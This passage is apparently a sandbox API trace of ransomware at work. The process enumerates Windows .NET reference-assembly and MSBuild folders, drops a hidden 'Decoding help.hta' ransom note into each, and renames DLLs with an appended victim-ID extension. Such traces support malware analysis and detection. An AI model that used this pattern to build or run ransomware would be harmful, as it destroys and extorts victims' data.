Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\workflow.visualbasic.targets"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\workflow.visualbasic.targets.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.724] FindNextFileW (in: hFindFile=0x5d8810, lpFindFileData=0x1771fd30 | out: lpFindFileData=0x1771fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eae0db9, ftCreationTime.dwHighDateTime=0x1ca03fe, ftLastAccessTime.dwLowDateTime=0x2eae0db9, ftLastAccessTime.dwHighDateTime=0x1ca03fe, ftLastWriteTime.dwLowDateTime=0x5fe776dc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x21e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Workflow.VisualBasic.Targets", cAlternateFileName="")) returned 0 [0056.724] FindClose (in: hFindFile=0x5d8810 | out: hFindFile=0x5d8810) returned 1 Thread: id = 574 os_tid = 0xd3c [0048.589] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*", lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9a8c6329, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9a8c6329, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7fd0 [0049.303] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.303] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9a8c6329, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9a8c6329, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.303] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.303] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.303] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa5f4b44, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xaa5f4b44, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xaaa915ec, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x92000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PresentationBuildTasks.dll", cAlternateFileName="")) returned 1 [0049.648] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0049.648] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0049.648] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0049.648] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0xffffffff [0049.648] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0052.159] WriteFile (in: hFile=0x424, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1781fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1781fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0053.978] CloseHandle (hObject=0x424) returned 1 [0055.311] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.082] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PresentationBuildTasks.dll") returned -1 [0058.082] lstrlenW (lpString="PresentationBuildTasks.dll") returned 26 [0058.082] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0058.082] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.082] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.082] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="PresentationBuildTasks.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll" [0058.082] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll" [0058.082] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.082] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationbuildtasks.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationbuildtasks.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.083] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab1db959, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xab1db959, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xab4fb63f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x406000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PresentationCore.dll", cAlternateFileName="")) returned 1 [0058.083] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.083] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.083] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.083] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.083] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PresentationCore.dll") returned -1 [0058.083] lstrlenW (lpString="PresentationCore.dll") returned 20 [0058.083] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.083] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.083] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="PresentationCore.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll" [0058.083] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll" [0058.083] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.083] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationcore.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationcore.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.083] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4de43cb, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0x4de43cb, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0x79b03bbc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x30000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PresentationFramework.Aero.dll", cAlternateFileName="")) returned 1 [0058.083] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.084] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.084] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.084] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.084] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PresentationFramework.Aero.dll") returned -1 [0058.084] lstrlenW (lpString="PresentationFramework.Aero.dll") returned 30 [0058.084] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0058.084] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.084] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.084] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="PresentationFramework.Aero.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll" [0058.084] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll" [0058.084] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.084] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.aero.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.aero.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.084] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ff96fd, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0x4ff96fd, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0x79e95cbc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x22000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PresentationFramework.Classic.dll", cAlternateFileName="")) returned 1 [0058.084] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.084] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.084] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.084] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.084] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PresentationFramework.Classic.dll") returned -1 [0058.084] lstrlenW (lpString="PresentationFramework.Classic.dll") returned 33 [0058.084] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0058.085] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.085] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.085] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="PresentationFramework.Classic.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll" [0058.085] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll" [0058.085] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.085] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.classic.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.classic.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.085] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaaa915ec, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xaaa915ec, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xab0aae57, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x509000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PresentationFramework.dll", cAlternateFileName="")) returned 1 [0058.085] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.085] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.085] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.085] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.085] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PresentationFramework.dll") returned -1 [0058.085] lstrlenW (lpString="PresentationFramework.dll") returned 25 [0058.085] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.086] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.086] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="PresentationFramework.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll" [0058.086] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll" [0058.086] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.086] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.086] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9dec0f5, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa9dec0f5, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xaa0e5c7a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x61000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PresentationFramework.Luna.dll", cAlternateFileName="")) returned 1 [0058.086] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.086] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.086] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.086] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.086] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PresentationFramework.Luna.dll") returned -1 [0058.086] lstrlenW (lpString="PresentationFramework.Luna.dll") returned 30 [0058.086] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 